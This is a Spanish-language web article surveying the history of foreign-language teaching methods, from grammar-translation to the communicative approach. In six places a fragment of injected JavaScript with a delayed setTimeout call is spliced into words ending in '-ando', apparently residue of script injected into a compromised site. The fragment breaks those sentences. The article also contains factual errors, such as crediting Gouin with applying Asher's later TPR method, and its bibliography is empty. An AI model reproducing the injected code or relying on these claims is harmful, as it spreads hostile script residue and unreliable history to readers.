CAMBIOS MÁS IMPORTANTES EN LA METODOLOGÍA DE LA ENSEÑANZA DE LENGUAS EXTRANJERAS EN LOS ÚLTIMOS TIEMPOS

Autora: Cristina Pintor Portero

La metodología de la enseñanza de lenguas extranjeras ha cambiado a través de los años, no siempre se han utilizado los mismos métodos. La prueba está en que los resultados no han sido siempre los mismos y la atención unas veces se ha centrado en un aspecto de la lengua, como puede ser la gramática, y otras en otro, como por ejemplo la competencia comunicativa.


La metodología de la enseñanza de lenguas extranjeras ha cambiado con el paso de los años, especialmente en los últimos tiempos. El aprendizaje de inglés está empezandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando a considerarse más y más importante, de hecho se considera el líder en cuanto a la comunicación internacional y, por esta razón, está ampliamente reconocido. Además, la invención de nuevas tecnologías constituye un aumento importante y un cambio consecuente en el estudio de la lengua.

Durante los siglos XVI, XVII y XVIII, las grammar school inglesas aplicaron lo que se llamó el “método de traducción gramatical” para el estudio de la lengua. Consistía en la enseñanza mediante la lectura de textos literarios y se centraba en la precisión de la producción del lenguaje. Este método de enseñanza significó el uso de la lengua materna en clase y el uso de listas de vocabulario bilingües para el aprendizaje del vocabulario. Por esta razón, la traducción era considerada el principal objetivo curricular. Este método, sin embargo, hoy en día está considerado obsoleto ya que la traducción no es el principal objetivo del aprendizaje de una lengua.

A éste es al que llamamos método clásico o gramatical, el cual tiene una visión normativa y prescriptiva. No fue hasta el siglo XIX que no hubo algunas innovaciones. Hasta entonces, la enseñanza de lenguas se basaba en el aprendizaje memorístico de reglas y listas de palabras.

Bien entrado el siglo XIX, tres lingüistas franceses e ingleses, respectivamente, centraron su atención en la adquisición del lenguaje de los niños más pequeños. C. Marcel (Francia) se refería al bebé aprendiz de su lengua materna como modelo para la enseñanza de lenguas extranjeras y también sugirió que la primera habilidad que debía ser enseñada era la lectura. En Inglaterra, T. Prendergast observó cómo los niños aprendían frases y las memorizaban aplicandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando claves contextuales y situacionales del momento del aprendizaje. El pensaba que estas estructuras básicas debían ser las primeras en ser enseñadas. F. Gouin, también de Francia, aplicó el método TPR (Total Physical Response o Respuesta Física Total) de Asher, ya que pensaba que el aprendizaje de la lengua era más fácil cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando se usaba para conseguir pruebas de acciones relacionadas.

Todas estas innovaciones llevaron a un movimiento reformista a finales del siglo XIX. La expresión oral era la habilidad básica y, por lo tanto, se empezó a enseñar fonética. Este método significaba el rechazo a la traducción y era una teoría de resolución de problemas en cuanto a la enseñanza de gramática. Esta teoría motivaba al alumno porque el potencial del mismo para resolver problemas crea una gran confianza en ellos mismos. Los líderes intelectuales de este movimiento fueron Henry Sweet (Inglaterra), Wihelm Viëtor (Alemania) y Paul Pass (Francia).

El método directo o el método Bertliz es una teoría monolingüe en la que la enseñanza es siempre en la segunda lengua y dónde siempre hay una asociación directa entre las formas y el significado para que el profesor no use el libro de texto sino mímica o descripción lingüística. Se enfatiza en la pronunciación y gramática correcta. Este método podría ser considerado menos factible porque las clases tienen que ser pequeñas e intensivas y debe haber una participación masiva de los alumnos, junto con el profesor. El vocabulario que se enseña debe ser vocabulario cotidiano y los profesores deben tener una competencia en la lengua extranjera que se acerque a la de un nativo.

El método directo significó un cambio de actitud en la enseñanza más que un método orgánico. Aún así, no podemos olvidarnos de que aprender una segunda lengua no se puede limitar en la imitación y repetición ya que esto requiere un lento aprendizaje y excluye el aprendizaje cognitivo, muy necesario en la enseñanza de adultos.

Distinto al método directo, el método de lectura o Reading Method centra su atención, como su propio nombre indica, en la lectura, enfatizandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la “lectura silenciosa”. Su interpretación debe ser mediante la segunda lengua, sin usar traducción.

Otro método, el método audio-oral (basado en el modelo conductual de la lengua), centra su atención en la habilidad de la expresión oral y la gramática no es tan importante como ser capaz de comunicarse. El uso oral de la lengua es el objetivo primordial y no se espera que los alumnos entiendan las reglas gramaticales. Viene de la lingüística estructural de Bloomfield y su escuela, quienes basan su teoría que la lengua extranjera se ha de entender como expresión oral y no como expresión escrita, como un acopio de hábitos lingüísticos y no como la realización de reglas y normas gramaticales. Éste método establece un orden distinto de presentación de los contenidos. En lugar de ser deductivo, que presenta primero las formas y luego las reglas, después los ejemplos y los ejercicios, pasa a ser inductivo. El método inductivo presenta primero los ejemplos, para pasar después a los “drills” estructurales. Así priman las destrezas auditiva y oral, así la enseñanza de la lengua se basa en la mera adquisición de hábitos.

Lo que se conoce como método cognitivo, es el método de enseñanza que está basado en la gramática generativa, la cual pretende reconstruir los principios de los hablantes de comunicarse entre sí. Siguiendo la teoría de Saussure, pertenece a la “langue”, no a la “parlole”, es decir, distingue entre la competencia y la actuación lingüística, el saber lingüístico y su empleo real en una situación concreta. El método cognitivo fundamenta la idea de que la lengua no debe limitarse únicamente a desarrollar y ejercitar estructuras lingüísticas sin previa explicación de las reglas, sino en transmitir a los alumnos un conocimiento cognitivo del sistema lingüístico que les permita crear diversas manifestaciones gramaticales. Sin embargo, este método no tiene en cuenta los componentes sociolingüísticos que intervienen en los actos de habla.

Finalmente, según A. Sánchez Pérez “lo que en nuestros días se denomina método comunicativo surge precisamente muy de la mano de los programas nocional-funcionales”. Esta teoría se apoya en el razonamiento de que la lengua sirve para comunicarse y, consecuentemente se valora lo que se dice, no tanto de la manera en que se dice.

Para concluir, se ha podido observar cómo la enseñanza de lenguas extranjeras y su metodología de enseñanza ha cambiado a través de los años, especialmente en relación con la gramática y la lengua oral. Hoy en día, la gramática no es tan importante como la habilidad o capacidad para comunicarse. Por tanto, actualmente se enseña en la lengua extranjera, por lo que la traducción se utiliza cada vez menos y está así quedandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando obsoleta en lo que se refiere al proceso de enseñanza-aprendizaje de una segunda lengua.

-       BIBLIOGRAFÍA:

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.